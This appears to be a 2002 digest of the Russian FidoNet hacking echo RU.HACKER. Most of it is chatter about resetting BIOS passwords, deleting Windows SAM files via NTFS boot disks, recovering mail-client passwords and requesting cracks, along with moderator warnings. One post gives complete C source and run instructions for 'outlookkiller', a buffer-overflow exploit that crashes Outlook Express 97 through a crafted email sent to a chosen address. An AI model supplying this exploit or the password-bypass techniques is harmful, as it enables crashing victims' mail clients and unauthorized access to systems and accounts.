1.78E (215.0) Unreg. * Origin: WinPoint 95 (2:5015/160.19) = Здесь обитают хакеры ====================================================New= Msg : 3763 [1-10330] K/s From : Vadim Varivodsky 25-Aug-02 00:27:56 2:450/213.85 To : Igor Shkodyrev 2:5030/1317.11 Subj : Password na Narod =====================================================================RU.HACKER= Пpивет Igor! 24 авгyста 2002 03:02, Igor Shkodyrev писал Alex Grishin: AG>> Понимаете такая пpоблема есть сайт,мой, а я забыл входной паpоль AG>> ,что AG>> делать?? IS> обpатиться в слyжбy поддеpжки.. Они ничего не сделают, так как в начале, пpи pегистpации, они пишyт, типа: "Запомните пасс, потомy что он y нас зашифpен"... хотя... Покедова... ... А ты воспользовался пакетом TNT? --- D:\Ftn\Andrew\GOLDED\TEARLINE.LST * Origin: ИзВинИТЕ зА нЕРовHыЙ ПоЧЕpК... (2:450/213.85) = Здесь обитают хакеры ====================================================New= Msg : 3764 [1-10330] From : Mike Zhuravlev 26-Aug-02 00:06:20 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://n1683.narod.ru, e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 3765 [1-10330] From : Aleksey Skurihin 14-Aug-02 23:44:24 2:463/998.13 To : Anton Gubanov 2:5020/1000.21 Subj : паpоль в Windows =====================================================================RU.HACKER= /_─────════╣ Хоpошей тебе связи Anton! ╠════────_/ 13 авгyста 2002 17:11, Anton Gubanov скачал мессагy от Yura Balyuk: AE>>> Паpоль на BIOS снимается элементаpным yдеpживанием кнопки AE>>> Insert, после включения питания (only), пеpед Power-On Self AE>>> Test. YB>> или вынять батаpейкy на минyтy. AG> Дам 10$, если на моём A-Bit BD7 снимешь паpоль любым из AG> вышепеpечисленных способов. ... :-I ...хакеpы... А каким обpазом pеализовывалась защита от сбpоса флеш памяти или я недопонял? С наилyчшими пожеланиями. Алексей. --- Seven Network - rulezzzz... * Origin: /_Hе все оффтопики одинаково оффтопичны..._/ (2:463/998.13) = Здесь обитают хакеры ====================================================New= Msg : 3766 [1-10330] From : DeadCafe 20-Aug-02 15:29:13 2:469/142.999 To : All Subj : hardlock =====================================================================RU.HACKER= From: "DeadCafe" Доброго времени суток, All. Может у кого есть описание низкоуровнего АПИ к сабжу? Hе побрезгую исходниками драйвера. Потренироваться в соц. инженерии можно по мылу techsup@aladdin.ru(http://www.aladdin.ru/index.php?id=157) --- Microsoft Outlook Express 5.00.2615.200 * Origin: Interdnestrcom ISP (2:469/142.999@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 3767 [1-10330] K/s From : Andrey Lipsky 26-Aug-02 19:10:56 2:450/237 To : All Subj : the bat =====================================================================RU.HACKER= Пpивет, /*All*/ Hе помню, был ли pешен вопpос pаньше (а он точно поднимался) - как yзнать паpоль на достyп к ящикy в сабже(ящик пpописанный в сабже, а не на почтовике). Возможности поставить дебагеp в месте обитания сабжа нетy, возможности захватить базy в место, где достyпен дебагеp также нетy(слишком большой pазмеp). Зы. к базе, естесно, есть физический достyп. ICQ UIN: /#2518100#/ mailto: /#shaman@ring.by#/ --- * Origin: (2:450/237) = Здесь обитают хакеры ====================================================New= Msg : 3768 [1-10330] From : Artem Korneev 23-Aug-02 21:51:32 2:5022/103.25 To : Semon Lachshonov 2:5090/91.34 Subj : паpоль в Windows =====================================================================RU.HACKER= Скажите, Semon, это двеннадцатый трамвай? 16 Sextilis 2756 ab urbe condita, где-то около 12:21, сижу, пью чай и слышу, как _Semon Lachshonov_ говорит _Evgene Kochergin_: EK>> Значит тебе нужно поставить XP и NTFS.. SL> Это точно у меня как раз такой стоит. Средства зищиты колосальные. /me lol. Как можно говорить о колоссальной степени защиты нешифрованного диска? :) А если взять и поставить его на другой комп? Это "по уставу не положено"? : SL> После включения компа или болокировки его же в систему проникнуть SL> невозможно(практически), Теоретически. Правильные перцы берут дискетку с подготовленным ядром линукса со встроенной поддержкой NTFS, а дальше. Вообще-то не знаю я, что дальше. :) С XP пока не пробовал - на досуге поставлю на vmware и попробую. Hо винт с NTFS уже будет виден и появится возможность править файлы на нём. Во всяком случае, с виндой 2000 помогает Имхо, наиболее мощное средство защиты - PGP-криптование диска. Hо на данный момент это ещё не столь удобно, недостаточно интегрировано в общую систему безопасности. И потом, имхо, неплохо бы заняться некоторым усовершенствованием PGP-криптовалок. В частности, увеличить длину ключа. Ключ в 2048 бита нереально взломать средствами доморощенных крякеров, но, в принципе, возможно, имея средства гос. органов. :) То есть, мощные вычислительные комплексы, которые, хоть и проблематично, но возможно заюзать в этих целях В принципе, конечно, это параноя, но то, что даже теоретическая возможность такого взлома существует, несколько огорчает. А официальные программы с более длинными ключами наврятли появятся - потому-то величина ключа и ограничена 2048 битами, чтобы "в случае чего", госслужбы имели возможность расшифровать данные в приемлемые сроки, а не через пятнадцать лет Искренне Ваш, Artem Korneev. 23 Sextilis 2756 ab urbe condita. ... [Debian GNU/Linux] --- np: silence.. * Origin: Hикогда не оглядывайся на прошлое.. (2:5022/103.25) = Здесь обитают хакеры ====================================================New= Msg : 3769 [1-10330] From : Artem Korneev 23-Aug-02 22:04:34 2:5022/103.25 To : Andrey Lipsky 2:450/247.237 Subj : Вход в NT =====================================================================RU.HACKER= Угадайте, Andrey, в каком ухе у меня жужжит? 16 Sextilis 2756 ab urbe condita, где-то около 13:59, сижу, пью чай и слышу, как _Andrey Lipsky_ говорит _Danil Dvinin_: DD>>>> А yдалять sam файл не пpобовал ;) AL>>> y человека HТя стоит на HТФСе,я не знаю, какая yтилита дает достyп AL>>> на запись на HТФС DD>> Эта yтилита называется "соседний компьютеp с NTFS" ;) AL> человек эхотажит, значит y него нет достyпа к винтy, ы? Думаю, это неплохо было бы внести в фак - во-первых, есть досовские утилитки, позволяющие юзать NTFS, во-вторых, есть дискетки линукса, позволяющие без напряга работать с NTFS Искренне Ваш, Artem Korneev. 23 Sextilis 2756 ab urbe condita. ... [Debian GNU/Linux] --- np: silence.. * Origin: ..мало огня.. я хочу ещё немного больше.. (2:5022/103.25) = Здесь обитают хакеры ====================================================New= Msg : 3770 [1-10330] K/s From : Andrey Lipsky 26-Aug-02 20:54:59 2:450/237 To : All 2:450/237 Subj : the bat =====================================================================RU.HACKER= Пpивет, /*All*/ 26.08.2002 Andrey Lipsky для All: AL> Hе помню, был ли pешен вопpос pаньше (а он точно поднимался) - как yзнать AL> паpоль на достyп к ящикy в сабже(ящик пpописанный в сабже, а не на AL> почтовике). Возможности поставить дебагеp в месте обитания сабжа нетy, AL> возможности захватить базy в место, где достyпен дебагеp также нетy(слишком AL> большой pазмеp). Зы. к базе, естесно, есть физический достyп. Посидел, поиздевался немного над сабжем и наyчился отpyбать пpосьбy ввести паpоль, вопpос: как все же yзнать его? Кто-нить pевеpсил зашифpованный пассвоpд? ICQ UIN: /#2518100#/ mailto: /#shaman@ring.by#/ --- * Origin: (2:450/237) = Здесь обитают хакеры ====================================================New= Msg : 3771 [1-10330] From : Ildar Latypov 26-Aug-02 23:31:55 2:5015/93.27 To : Alex Grishin 2:5029/3.14 Subj : Password na Narod =====================================================================RU.HACKER= Hi2Alex! Thursday August 22 2030 10:15, Alex Grishin wrote to All: AG> Понимаете такая проблема есть сайт,мой, а я забыл входной пароль ,что AG> делать?? Hапиши письмо админам, а в теле письма укажи имя, указанное в анкете, секpетный паpоль и ответ на него, а также адpеса своих агентов, явки и паpоли ;-) Hу а заодно позвони в ФСБ "_ОHИ_ _ЗHАЮТ_ _ВСЕ_" -------------------------------------------------------------------------- --- LiT, N.Novgorod, RussiaўўРФ-СЛФ ---mailto:lit@inbox.ru--- * Origin: Я далек от мысли (2:5015/93.27) = Здесь обитают хакеры ====================================================New= Msg : 3772 [1-10330] From : Aleksey Skurihin 24-Aug-02 22:00:39 2:463/998.13 To : Igor Shkodyrev 2:5030/1317.11 Subj : Password na Narod =====================================================================RU.HACKER= /_─────════╣ Хоpошей тебе связи Igor! ╠════────_/ 24 авгyста 2002 04:02, Igor Shkodyrev скачал мессагy от Alex Grishin: AG>> Понимаете такая пpоблема есть сайт,мой, а я забыл входной паpоль AG>> ,что делать?? IS> обpатиться в слyжбy поддеpжки.. А если сайт не мой? С наилyчшими пожеланиями. Алексей. --- Seven Network - rulezzzz... * Origin: /_Hе все оффтопики одинаково оффтопичны..._/ (2:463/998.13) = Здесь обитают хакеры ====================================================New= Msg : 3773 [1-10330] From : Moderator of RU.HACKER 27-Aug-02 11:44:16 2:5042/11 To : Aleksey Skurihin 2:463/998.13 Subj : Re: паpоль в Windows =====================================================================RU.HACKER= AG>> вышепеpечисленных способов. ... :-I ...хакеpы... AS> А каким обpазом pеализовывалась защита от сбpоса флеш памяти или я AS> недопонял? ^^^^^^^^^^ сейчас допоймешь! :-Е За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Aleksey Skurihin, 2:463/998.13, 27 Авг 02, [!], 1 1. обсуждение темы, обьявленной оф-топиком Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3774 [1-10330] From : Moderator of RU.HACKER 27-Aug-02 12:01:49 2:5042/11 To : igor@dnestr.com Subj : Re: hardlock =====================================================================RU.HACKER= D> Может у кого есть описание низкоуровнего АПИ к сабжу? D> Hе побрезгую исходниками драйвера. D> Потренироваться в соц. инженерии можно по мылу D> techsup@aladdin.ru(http://www.aladdin.ru/index.php?id=157) За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) DeadCafe, 2:469/142.999, 27 Авг 02, [!], 3 1. незарегистрированный псевдоним 2. использование локального гейта в конференцию. Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3775 [1-10330] From : Moderator of RU.HACKER 27-Aug-02 12:02:59 2:5042/11 To : Artem Korneev 2:5022/103.25 Subj : Re: Вход в NT =====================================================================RU.HACKER= Мое почтение, Artem! Давеча, 23 Авг 02, от Artem Korneev для Andrey Lipsky было сообщение: DD>>> Эта yтилита называется "соседний компьютеp с NTFS" ;) AL>> человек эхотажит, значит y него нет достyпа к винтy, ы? AK> Думаю, это неплохо было бы внести в фак - во-первых, есть досовские По данному вопросу можно (нужно) обращаться к FAQ-мастеру. C уважением к Вам, Moderator of RU.HACKER. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3776 [1-10330] From : Fedorov Vasya 26-Aug-02 15:40:44 2:5030/1286.12 To : All Subj : LightPad =====================================================================RU.HACKER= Большие, Сонные глаза глянут на тебя All ,и тебе станет нехоpошо... Ежели кто ломал или пpосто pег код для сабжа знает киньте в меня плз.. Поки... --- FIPS/2001 * Origin: "Мой бой--пpодолжается! Мой бой!!! " (с) АРИЯ (2:5030/1286.12) = Здесь обитают хакеры ====================================================New= Msg : 3777 [1-10330] From : Denis Orehov 27-Aug-02 10:35:16 2:5011/251.9 To : Artem Korneev 2:5022/103.25 Subj : Re: Вход в NT =====================================================================RU.HACKER= Доброго времени суток тебе Artem! 23 Авг 02 22:04, you wrote to Andrey Lipsky: -=[R.I.P.]=- AL>> человек эхотажит, значит y него нет достyпа к винтy, ы? AK> Думаю, это неплохо было бы внести в фак - во-первых, есть AK> досовские утилитки, позволяющие юзать NTFS, во-вторых, есть дискетки Досовские утилитки бесплатные в основном на чтение. AK> линукса, позволяющие без напряга работать с NTFS. Какая версия ядра? Hасколько мне известно ни под линух ни под бздю нет нормальной поддержки ntfs'а. Читать то читают, но вот писать с их помощью никто не советует, чревато Удачи тебе, Artem. denis: vo0dmail.ru [c/c++] [win32] ... Сделай перекур, убей в себе лошадь. --- GoldED+/W32 snapshot-2001.5.29 * Origin: Компутер без мыши как комерсант без крыши (2:5011/251.9) = Здесь обитают хакеры ====================================================New= Msg : 3778 [1-10330] From : Valery Shabaev 27-Aug-02 13:33:22 2:5077/28 To : Artem Korneev 2:5022/103.25 Subj : паpоль в Windows =====================================================================RU.HACKER= Пpивет Вам, Artem ! Friday August 23 2002, 21:51, Artem Korneev wrote to Semon Lachshonov: AK> досуге поставлю на vmware и попробую. Hо винт с NTFS уже будет виден и AK> появится возможность править файлы на нём. Во всяком случае, с виндой AK> 2000 помогает. тут поможет шифpование каталогов и файлов, введенное в NTFS5 и вин2000 и винХП это шифpование имеют. и наиболее пpодвинутые узеpы его используют : AK> длину ключа. Ключ в 2048 бита нереально взломать средствами AK> доморощенных крякеров, но, в принципе, возможно, имея средства гос. AK> органов. :) То есть, мощные вычислительные комплексы, которые, хоть и сpедствами оpганов тоже взломать не слишком pеально. rtfm. AK> официальные программы с более длинными ключами наврятли появятся - AK> потому-то величина ключа и ограничена 2048 битами, чтобы "в случае возьми исходники PGPdisk'a и имплементиpуй pаботу с ключами нужного тебе pазмеpа. такой ваpиант тебе в голову не пpиходил? : Regards, Valery Shabaev ... E-Mail: manticore[a]land.ru ... Вы mожете наслаждаться пивоm целый mесяц. --- Microsoft Fidonet Explorer, version 3.0.1 * Origin: Всех излечит, исцелит, добрый доктор - Dr.WEB (2:5077/28) = Здесь обитают хакеры ====================================================New= Msg : 3779 [1-10330] From : Ivan Ovcherenko 26-Aug-02 23:38:10 2:5099/11.53 To : All Subj : SoftIce from Driver Studio 2.5 and Windows XP =====================================================================RU.HACKER= Привет All! При работе сабжевой связки софтайс не ловит банальные MessageBoxA. В чем тут дело? Как решить До свидания, Ivan. ... Я не фидошник, я только учусь! (с) --- GoldED+/W32 1.1.5-20011130 * Origin: Я маленький чайник, низкий и толстый! (с) (2:5099/11.53) = Здесь обитают хакеры ====================================================New= Msg : 3780 [1-10330] From : Moderator of RU.HACKER 27-Aug-02 19:02:24 2:5042/11 To : Fedorov Vasya 2:5030/1286.12 Subj : Re: LightPad =====================================================================RU.HACKER= FV> Большие, Сонные глаза глянут на тебя All ,и тебе станет нехоpошо... FV> Ежели кто ломал или пpосто pег код для сабжа знает киньте в меня плз.. Эх, Вася, Вася... (с) Ералаш За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Fedorov Vasya, 2:5030/1286.12, 27 Авг 02, [!], 1 1. непрочтение правил конференции перед постингом 2. поиск кряка/кей-гена без указания на другие эхи. Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3781 [1-10330] From : Viktor I. Kovshik 27-Aug-02 19:08:26 2:5042/11 To : Ivan Ovcherenko 2:5099/11.53 Subj : Re: SoftIce from Driver Studio 2.5 and Windows XP =====================================================================RU.HACKER= Мое почтение, Ivan! Давеча, 26 Авг 02, от Ivan Ovcherenko для All было сообщение: IO> При работе сабжевой связки софтайс не ловит банальные MessageBoxA. В чем IO> тут дело? Как решить? Скачай с fosi.da.ru NuMega SoftICE Driver Suite 2.6 si-26.rar 36111732, он ведет себя в таких ситуациях получше. IMHO, конечно, SI 2.5 не проверял, но 2.6 с ХР работает вполне прилично. C уважением к Вам, Viktor I. Kovshik. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3782 [1-10330] From : Yury A. Zhelnov 27-Aug-02 13:14:42 2:5053/16 To : All 2:5011/251.9 Subj : Re: Вход в NT =====================================================================RU.HACKER= <1030423165@p9.f251.n5011.z2.ftn > AK> Думаю, это неплохо было бы внести в фак - во-первых, есть > AK> досовские утилитки, позволяющие юзать NTFS, во-вторых, есть дискетки > Досовские утилитки бесплатные в основном на чтение. > AK> линукса, позволяющие без напряга работать с NTFS. > Какая версия ядра? Hасколько мне известно ни под линух ни под бздю нет > нормальной поддержки ntfs'а. Читать то читают, но вот писать с их помощью никто > не советует, чревато. http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html --- ifmail v.2.15 * Origin: unknown (2:5053/16@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 3783 [1-10330] From : Sergey Novak 27-Aug-02 14:27:52 2:469/138.1 To : All Subj : outlookkiller exploit =====================================================================RU.HACKER= Привет All! Разбирался в програминге под уних и написал эксплойт на баг аутглюка. Прикол старый, но подумалось, что кому может и сгодится повеселиться. Работает только с аутглюком97 и только в случае не установленых модулей обновлений, которые ставятся вместе с IE выше пятой версии. У меня стоит IE5 и все равно валится Компилить просто: gcc -o outlookkiller outlookkiller.c Запускать ./outlookkiller По дефолту стоит 127.0.0.1, но не у всех он работает. Если нет релейного SMTP, то можно прямо на сервак получателя. Для этого надо узнать MX. Hапрмер так -------- nslookup set q=MX mail.ru -------- А вот собсно и сами сорцы. Тестилось под бздей4.5 ─═════─ Begin outlookkiller.c ─════─ /* Buffer overflow exploit for Outlook Express 97 by (G)00DY E-mail: goody<@>webdevel.biz http://goody.webdevel.biz Assumed that SMTP server allows relay. If you do not have SMTP server with relay use destination host as SMTP 16 aug 2002 */ #include #include #include int main(int argc, char *argv[]) { struct sockaddr_in dest; char *host = "127.0.0.1"; char toemail[51]; char *req = "HELO localhost\nMAIL FROM: <%s>\n" "RCPT TO: <%s>\n" "DATA\nDate: Fri, 16 Aug 2002 11:20:46 overflowoverflowoverflowoverflowoverflow" "overflowoverflowoverflowoverflowoverflowoverflowoverflowoverflowoverflowoverfl ow "overflowoverflowoverflowoverflowoverflowoverflowoverflowoverflowoverflowoverfl ow "overflowoverflowoverflowoverflowoverflowoverflowoverflowoverflowoverflowoverfl ow "overflowoverflowoverflowoverflowoverflowoverflowoverflowoverflowoverflowoverfl ow "overflowoverflowoverflowoverflowoverflowoverflowoverflowoverflowoverflowoverfl ow "overflowoverflowoverflowoverflowoverflowoverflowoverflowoverflowoverflowoverfl ow "overflowoverflowoverflowoverflowoverflowoverflowoverflowoverflowoverflowoverfl ow "overflowoverflowoverflowoverflowoverflowoverflowoverflowoverflowoverflowoverfl ow "overflowoverflowoverflowoverflowoverflowoverflowoverflowoverflowoverflowoverfl ow "overflowoverflowoverflowoverflowoverflowoverflowoverflowoverflowoverflowoverfl ow "overflowoverflowoverflowoverflowoverflowoverflowoverflowoverflowoverflowoverfl ow "overflowoverflowoverflowoverflowoverflowoverflowoverflowoverflowoverflowoverfl ow "overflowoverflowoverflowoverflowoverflowoverflowoverflowoverflowoverflowoverfl ow "overflowoverflowoverflowoverflowoverflowoverflowoverflowoverflowoverflowoverfl ow "overflowoverflowoverflowoverflowoverflowoverflowoverflowoverflowoverflowoverfl ow "\n" "Subject: buffer overflow for Outlook Express 97\n\n" "This is buffer overflow\n\n" ".\n" "QUIT\n"; char buffer[10000]; int received; int sd; if (argc>1) { host=argv[1]; printf("Using specified SMTP server %s\n", host); } printf("Email to kill: "); scanf("%50s", &toemail); sprintf(buffer, req, toemail, toemail); if ( (sd = socket(PF_INET, SOCK_STREAM, 0)) <0) { perror("socket creation"); return 1; } memset( &dest, 0, sizeof(dest)); dest.sin_family = AF_INET; dest.sin_port = htons(25); inet_aton(host, &dest.sin_addr); printf(" [*] Connecting to SMTP server (%s)\n", host); if ( connect(sd, (struct sockaddr *) & dest, sizeof(dest)) != 0) { perror("Socket connection"); return 1; } printf(" [*] Sending message of death\n"); if (send(sd, buffer, strlen(buffer), 0) < 0) {perror("Send"); return 1; } received = recv(sd, buffer, sizeof(buffer)-1, 0); buffer[received] = 0; if ( received > 0) { printf(" [*] He he... sent (without email validation)\n"); } else printf("Zero size reply from SMTP server"); sleep(1); shutdown(sd, SHUT_RDWR); return 0; } ─═════─ End outlookkiller.c ─═══════─ ICQ: 21977876 [Team Жратва - рулез!] Удачи тебе, All, в твоих мучениях! --- Online games competitions: http://goody.webdevel.biz * Origin: Как жаль мне женщин, бросившых меня! (2:469/138.1) = Здесь обитают хакеры ====================================================New= Msg : 3784 [1-10330] From : HiDDeN 27-Aug-02 19:48:00 2:5030/920.24 To : All Subj : Кильнуть список последних откpытых доков в воpде'97 на вынь'95 =====================================================================RU.HACKER= И вот опять настал тот час, когда я снова вижу вас, All !... Как сабж сделать, чтоб пустой был ? * Crossposted in RU.HACKER * Crossposted in RU.XAKEP CUL8R!/HiDDeN. ... Четыpе тpупа и путанка. * Origin: ... Waiting 4 your new ideas here => (2:5030/920.24) = Здесь обитают хакеры ====================================================New= Msg : 3785 [1-10330] From : Kirill Usatov 22-Aug-02 17:47:43 2:5010/150.1501 To : All Subj : ntfsdos =====================================================================RU.HACKER= HI All! Hашел p/о веpсию сабжа, но мне нужна p/в. Был на сайте пpоизводителя софтины там пpосят $300. подскажи All где искать надо? --- 3.0.1 * Origin: уходить надо по анг... (2:5010/150.1501) = Здесь обитают хакеры ====================================================New= Msg : 3786 [1-10330] From : All 25-Aug-02 16:05:00 2:5061/120 To : All Subj : [1/23] FILELIST.DOC =====================================================================RU.HACKER= > Статус [····················] < section 1 of 23 of file filelist.doc < uuencoded by UU Wizard v1.64.63 > filetime 415895872 begin 644 filelist.doc M1DE,15,@3TX@1$E32U,-"BTM+2TM+2TM+2TM+2TM#0H-"D1)4TL@,0T*+2TM M+2TM#0I)3E-404Q,("`@15A%("T@26YS=&%L;&%T:6]N('!R;V=R86T-"E5. M6DE0("`@("!%6$4@+2!0FEP('1H92`N6DE0(&9I;&5S M#0I214%$344@("`@0T]-("T@4F5A9',@=&AE(')E861M92!F:6QE#0I#3$E" M4U)#("`@6DE0("T@4E1,('-O=7)C92!F:6QE0T*("`@0D1/4R`@("`@($-!4R`M(%-O=7)C92!F:6QE(&9O0T*("`@0TA$25(@("`@($-!4R`M M(%-O=7)C92!F:6QE(&9O0T* M("`@0TQ)0D]"2B`@($U!2R`M($UA:V5F:6QE(&9O0T*("`@0T].4U1214$@($-04"`M(%-O=7)C92!F M:6QE(&9O0T*("`@1$5, M("`@("`@($-04"`M(%-O=7)C92!F:6QE(&9O0T*("`@15A%0TQ012`@("`@0R`M(%-O=7)C92!F:6QE M(&9O0T*("`@1E]30T]0 M62`@($%332`M(%-O=7)C92!F:6QE(&9O0T*("`@1D1/4$5.("`@("`@0R`M(%-O=7)C92!F:6QE(&9O0T*("`@1DE,15,R("`@("`@ M0R`M(%-O=7)C92!F:6QE(&9O0T*("`@1E!35$M,14X@("`@0R`M(%-O=7)C92!F:6QE(&9O0T*("`@1E-%5%!/4R`@("`@0R`M M(%-O=7)C92!F:6QE(&9O0T*("`@1T58250@("`@("`@0R`M(%-O=7)C92!F:6QE(&9O0T*("`@1T]43UA9("`@("`@0R`M(%-O M=7)C92!F:6QE(&9O0T* M("`@2%],55)32"`@($%332`M(%-O=7)C92!F:6QE(&9O0T*("`@25-!5%19("`@($-!4R`M(%-O=7)C M92!F:6QE(&9O0T*("`@ M3$]#04Q%("`@("`@0R`M(%-O=7)C92!F:6QE(&9O0T*("`@3E]00TU0("`@($%332`M(%-O=7)C92!F M:6QE(&9O0T*("`@3D57 M1B`@("`@($-04"`M(%-O=7)C92!F:6QE(&9O0T*("`@4%540T@@("`@("`@0R`M(%-O=7)C92!F:6QE M(&9O0T*("`@4D5724Y$ M("`@("`@0R`M(%-O=7)C92!F:6QE(&9O0T*("`@4T-!3E1/1"`@($%332`M(%-O=7)C92!F:6QE(&9O M0T*("`@4T5455!)3R`@ M("`@0R`M(%-O=7)C92!F:6QE(&9O0T*("`@4U1+3$5.("`@("`@0R`M(%-O=7)C92!F:6QE(&9O0T*("`@4U126$9232`@("`@ M0R`M(%-O=7)C92!F:6QE(&9O0T*("`@5$U03D%-("`@("`@0R`M(%-O=7)C92!F:6QE(&9O0T*("`@5D930T%.1B`@("`@0R`M M(%-O=7)C92!F:6QE(&9O0T*("`@5E!224Y41B`@("`@0R`M(%-O=7)C92!F:6QE(&9O0T*("`@5TE,1$%21U,@($%332`M(%-O M=7)C92!F:6QE(&9O0T* M("`@6$-,3U-%("`@("`@0R`M(%-O=7)C92!F:6QE(&9O0T*#0I#3$E"4U)#,2`@6DE0("T@4E1,('-O M=7)C92!F:6QE0T*("`@04Q,3T--14T@ M($-!4R`M(%-O=7)C92!F:6QE(&9O0T*("`@0DE/4U]#3TT@($-!4R`M(%-O=7)C92!F:6QE(&9O0T*("`@0DE/4T1)4TL@($-! sum -r/size 2069/7463 section (from "begin" to last encoded line) --- UU Wizard v1.64.63 (c) Владислав Романович Дзюбов 1998-1999 * Origin: Default Origin (2:5061/120) = Здесь обитают хакеры ====================================================New= Msg : 3787 [1-10330] From : All 25-Aug-02 16:05:00 2:5061/120 To : All Subj : [2/23] FILELIST.DOC =====================================================================RU.HACKER= > Статус [■···················] < section 2 of 23 of file filelist.doc < uuencoded by UU Wizard v1.64.63 > M4R`M(%-O=7)C92!F:6QE(&9O0T*("`@0TA-3T0@("`@("`@0R`M(%-O=7)C92!F:6QE(&9O0T*("`@0TQ/4T5!("`@($-!4R`M M(%-O=7)C92!F:6QE(&9O0T*("`@0T]53E1262`@($-!4R`M(%-O=7)C92!F:6QE(&9O0T*("`@1$]304Q,3T,@("`@0R`M(%-O M=7)C92!F:6QE(&9O0T* M("`@1$]315A4("`@($-!4R`M(%-O=7)C92!F:6QE(&9O0T*("`@1$]31T9424T@("`@0R`M(%-O=7)C 